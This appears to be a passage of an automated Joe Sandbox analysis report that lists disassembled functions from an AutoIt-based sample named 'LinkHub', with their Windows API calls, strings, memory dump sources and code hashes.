Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B06299

Strings

Line %d: , xrefs: 00B45305
AutoIt - , xrefs: 00B0620D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: ac83bee25a0a2380072b55492d4612a9034dad77ba1c40db6a0283a3b4a27f5e
Instruction ID: f3d1241ec9a165f7ab5a0b55c4b6ba54391620bd6be452b6de34fbd5b293c864
Opcode Fuzzy Hash: ac83bee25a0a2380072b55492d4612a9034dad77ba1c40db6a0283a3b4a27f5e
Instruction Fuzzy Hash: 8E4192714083056BC720EB60DC41EDFBBE8AF54320F0046AEF599931E1EF749A59CB96

Function 00B058CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B058BE,SwapMouseButtons,00000004,?), ref: 00B058EF
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B058BE,SwapMouseButtons,00000004,?), ref: 00B05910
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B058BE,SwapMouseButtons,00000004,?), ref: 00B05932

Strings

Control Panel\Mouse, xrefs: 00B058ED

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 5c1b96be1b666dd1b051fcbdfb5ddeda9ed61480b35c54470bcbbee9fe4e8700
Instruction ID: 8746f0211d96dfc745abb1c5411eec22e8e20d8eff149d201b1d5154e7530d58
Opcode Fuzzy Hash: 5c1b96be1b666dd1b051fcbdfb5ddeda9ed61480b35c54470bcbbee9fe4e8700
Instruction Fuzzy Hash: 82117975610618FFDB218F65CC80EAFBBF8EF40760F1084AAF801E7250E631AE419B60

Function 00B0F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B548C6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 86006b602e5888cee2371563c63565b45f76b417316d9cb3e5e0d338459f81fe
Instruction ID: 2de9ba5d5ae1ad627d28c02753bd0b27f311314788f94ecb47eec36feb9ad12d
Opcode Fuzzy Hash: 86006b602e5888cee2371563c63565b45f76b417316d9cb3e5e0d338459f81fe
Instruction Fuzzy Hash: FEC27A71A00216DFCB24DF58D890BBDBBF1FB08314F2481E9E905AB6A1D775AD81CB91

Function 00B2014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B209D8

Part of subcall function 00B23614: RaiseException.KERNEL32(?,?,?,00B209FA,74DE2E40,?,?,?,?,?,?,?,00B209FA,?,00BC9758), ref: 00B23674

__CxxThrowException@8.LIBVCRUNTIME ref: 00B209F5

Strings

Unknown exception, xrefs: 00B20A02

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: a0c45744e79d4a7a5ac8b52cc0514457d6cbfea494d16683d1cc34a894829021
Instruction ID: 37cc583e9f8efa382c4088a19276e489d65084e84af6a1377a3dc37f2817bf11
Opcode Fuzzy Hash: a0c45744e79d4a7a5ac8b52cc0514457d6cbfea494d16683d1cc34a894829021
Instruction Fuzzy Hash: 44F0283092021CB79B00BAA8FC46E9E77EC8E00350B5041E1B92CA65E3FB30EA55C7C0

Function 00B889B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B88D52
TerminateProcess.KERNEL32(00000000), ref: 00B88D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00B88F3A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 4fd63ac0d9cc20d9ad946af18426296a7164f3455fa380655601e635392fa9f2
Instruction ID: 0ed7241678967666b763ba81c0fbffbcbbcb4303b7262aee3d8b6f582aadc6e0
Opcode Fuzzy Hash: 4fd63ac0d9cc20d9ad946af18426296a7164f3455fa380655601e635392fa9f2
Instruction Fuzzy Hash: BB126A71A083019FC714DF28C484B6ABBE5FF84314F54899DE9899B3A2DB31E945CF92

Function 00B89AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B89B87
_strcat.LIBCMT ref: 00B89BC6
_wcslen.LIBCMT ref: 00B89C14

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 99176ed0f4fe2405ded4ef70f7902dee139c8f565af5dc40b02c5248caa4b20b
Instruction ID: 53075481c4ab67f61440e7c70857a1aa193c17a5154c3995056dcc150eef9eaf
Opcode Fuzzy Hash: 99176ed0f4fe2405ded4ef70f7902dee139c8f565af5dc40b02c5248caa4b20b
Instruction Fuzzy Hash: 3CA14831604515EFCB18EF18D5D19A9BBE1FF45314B6484ADE85A8F2A2DB32ED42CF80

Function 00B02793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B032AF
Part of subcall function 00B0327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B032B7
Part of subcall function 00B0327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B032C2
Part of subcall function 00B0327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B032CD
Part of subcall function 00B0327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B032D5
Part of subcall function 00B0327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B032DD

Part of subcall function 00B03205: RegisterWindowMessageW.USER32(00000004,?,00B02964), ref: 00B0325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B02A0A
OleInitialize.OLE32 ref: 00B02A28
CloseHandle.KERNELBASE(00000000,00000000), ref: 00B43A0D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: c81038504747fe6401d93b2bedbc69e8f6e1eab84efc036a5061b0015bd99aaf
Instruction ID: 49a1386e57499e0378f632fff6844c7abc14c39c2697008c535ce766be94b87a
Opcode Fuzzy Hash: c81038504747fe6401d93b2bedbc69e8f6e1eab84efc036a5061b0015bd99aaf
Instruction Fuzzy Hash: 79719BB59122818EC788EF69BD79A15FBE0BB7830834082ABA508C73A1FF7044459F64

Function 00B38A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00B3894C,?,00BC9CE8,0000000C), ref: 00B38A84
GetLastError.KERNEL32(?,00B3894C,?,00BC9CE8,0000000C), ref: 00B38A8E
__dosmaperr.LIBCMT ref: 00B38AB9

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 3d989f0a79dc80bb2fc24883f46cf7d4221501181d6c73a22e426f9a469785ba
Instruction ID: 0c9769f2a15178588c20db2905ecd96393feb2bb7c8f7ea91c747bca9c2bc743
Opcode Fuzzy Hash: 3d989f0a79dc80bb2fc24883f46cf7d4221501181d6c73a22e426f9a469785ba
Instruction Fuzzy Hash: B00104326053606AC6246274A886B7E77C9CB81734F3906DBF8188B2D2DF308D804592

Function 00B3970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B397BA,FF8BC369,00000000,00000002,00000000), ref: 00B39744
GetLastError.KERNEL32(?,00B397BA,FF8BC369,00000000,00000002,00000000,?,00B35ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B26F41), ref: 00B3974E
__dosmaperr.LIBCMT ref: 00B39755

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 45261a451f9f19baa9fcc505b948c8a59d625b206b85447f7d024ef122f0c7e2
Instruction ID: 9e3a18cb078aed8998a8becc0740fd4fed385baa28cee1fc1b2bba4cdf0273a4
Opcode Fuzzy Hash: 45261a451f9f19baa9fcc505b948c8a59d625b206b85447f7d024ef122f0c7e2
Instruction Fuzzy Hash: D0012833720115EBCB159F99EC458AE7BA9EB85330F340299F815971D0EB709D41CBD0

Function 00B70D18 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00B70B03,00000000,?,00000000,?,00B43A00,00000000), ref: 00B70D2E
GetCurrentProcess.KERNEL32(?,00000000,?,00B70B03,00000000,?,00000000,?,00B43A00,00000000), ref: 00B70D36
DuplicateHandle.KERNELBASE(00000000,?,00B70B03,00000000,?,00000000,?,00B43A00,00000000), ref: 00B70D3D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 47acec88023cc6981188d6912ebe52382ed821d968be75cee92f34679ca072a2
Instruction ID: ced7970637b4dad62aca8f4b1579348213471f6163e8a7cd9f2a79c50f66fce4
Opcode Fuzzy Hash: 47acec88023cc6981188d6912ebe52382ed821d968be75cee92f34679ca072a2
Instruction Fuzzy Hash: 64D01777154305BBC7122BE6ED09F3A7BACDB86B62F10806AFA0D971509EB095009625

Function 00B12B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B13006

Strings

CALL, xrefs: 00B12FD6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 175827695a4b88cf97e465bf2769e8c37d43188adccb2a7557ad121660a5be2a
Instruction ID: ea2dd7faef4de856df68873aca64f40b78f813086244cb5fc81b0f9dd495b2be
Opcode Fuzzy Hash: 175827695a4b88cf97e465bf2769e8c37d43188adccb2a7557ad121660a5be2a
Instruction Fuzzy Hash: 1922AD706082019FC714DF14D484B6ABBF1FF98304F5489ADF8998B3A2DB71E995CB92

Function 00B03A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00B4413B

Part of subcall function 00B05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B055D1,?,?,00B44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B05871

Part of subcall function 00B03A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B03A76

Strings

X, xrefs: 00B44109

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 4df4779d67cb942d9df84415b01ff18bdd7e0e2500add897d11f5e3195c4f139
Instruction ID: 442e716c5aac08ee20f230eac0406fd5ea71551f44f208090750f10cd88d3ad8
Opcode Fuzzy Hash: 4df4779d67cb942d9df84415b01ff18bdd7e0e2500add897d11f5e3195c4f139
Instruction Fuzzy Hash: 1A21A171A002589BCB01DF94C809BEE7FFCAF48300F008099E445B7281DFB89A898F61

Function 00B1FFE0 Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00B2007D
SetErrorMode.KERNELBASE ref: 00B2008F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseErrorHandleMode
String ID:
API String ID: 3953868439-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 7c42bcffa718d4433572c25783e0aee4faf07aff4db8d71a148e5df1e634b478
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: CB31C070A10119DFE718EF58E490A6AFBE6FB49300B2486E5E409CB256D732EDC1CBC0

Function 00B0396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B03A3C

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: ffbafc6e3479915e40108eca636760e8982b0cc7ec34e7220e833c89a456ce05
Instruction ID: 8afbf69f4a078e7c80d44358216406546de7f6f05c314756dd1461aec94c1be9
Opcode Fuzzy Hash: ffbafc6e3479915e40108eca636760e8982b0cc7ec34e7220e833c89a456ce05
Instruction Fuzzy Hash: 1E31D5706053018FD320DF24D894797BBE8FB59718F00096EE5DA97380E774AA48CB52

Function 00B34EB8 Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B34F04
GetFileType.KERNELBASE(00000000), ref: 00B34F16

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: cd3e2d1153b1ba2de68fa95b915257058725f7aa600a21bf8f5007b08f6a81db
Instruction ID: 3cabae3fcf04b9cb4ea47e3988dbf5657b72920c3a090ed88c9d7cca888e3286
Opcode Fuzzy Hash: cd3e2d1153b1ba2de68fa95b915257058725f7aa600a21bf8f5007b08f6a81db
Instruction Fuzzy Hash: F211B1311087515BC7348A3E9C88622BAD4EB96334F3C0B9AD5BAC75F1C734E8819650

Function 00B70AC4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00B43A00,00000000), ref: 00B70AEC
InterlockedExchange.KERNEL32(00000038,00000000), ref: 00B70B0E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 6de383d573c6a121d0e4545b22274120d2cefda13b1b04949a457caaa46b46ef
Instruction ID: 16cbf4b82a489d63e7f34a39ad783ee0ddcd5fb9aa0693343f254e0022a27cbc
Opcode Fuzzy Hash: 6de383d573c6a121d0e4545b22274120d2cefda13b1b04949a457caaa46b46ef
Instruction Fuzzy Hash: ACF017B15007059BC3209F56D9448A7FBECFF94720B40892FE49687A20CBB4B045CB91

Function 00B0331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00B0333D

Part of subcall function 00B032E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B032FB
Part of subcall function 00B032E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B03312

Part of subcall function 00B0338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B03368,?), ref: 00B033BB
Part of subcall function 00B0338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B03368,?), ref: 00B033CE
Part of subcall function 00B0338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BD2418,00BD2400,?,?,?,?,?,?,00B03368,?), ref: 00B0343A
Part of subcall function 00B0338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00BD2418,?,?,?,?,?,?,?,00B03368,?), ref: 00B034BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00B03377

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: a44f6f31cf5f8153e4c05eff926ae5fa894cb80416e9b6ef779f2b05d82114f4
Instruction ID: b23d5e106805bf28aa4cf2ae72b1b0874319cb798880e54489c7a71c987e015d
Opcode Fuzzy Hash: a44f6f31cf5f8153e4c05eff926ae5fa894cb80416e9b6ef779f2b05d82114f4
Instruction Fuzzy Hash: A3F05E31555384AFD310AF64FD5FB24BFE4A720B29F04485BB509871E2EFBA85508B58

Function 00B70B4C Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00B71312: InterlockedExchange.KERNEL32(?,?), ref: 00B71322
Part of subcall function 00B71312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00B71334
Part of subcall function 00B71312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00B71342
Part of subcall function 00B71312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B71350
Part of subcall function 00B71312: CloseHandle.KERNEL32(00000000), ref: 00B7135F
Part of subcall function 00B71312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00B7136F
Part of subcall function 00B71312: LeaveCriticalSection.KERNEL32(00000000), ref: 00B71376

CloseHandle.KERNELBASE(?,?,00B70BBF), ref: 00B70B5D
DeleteCriticalSection.KERNEL32(?,?,00B70BBF), ref: 00B70B83

Memory Dump Source

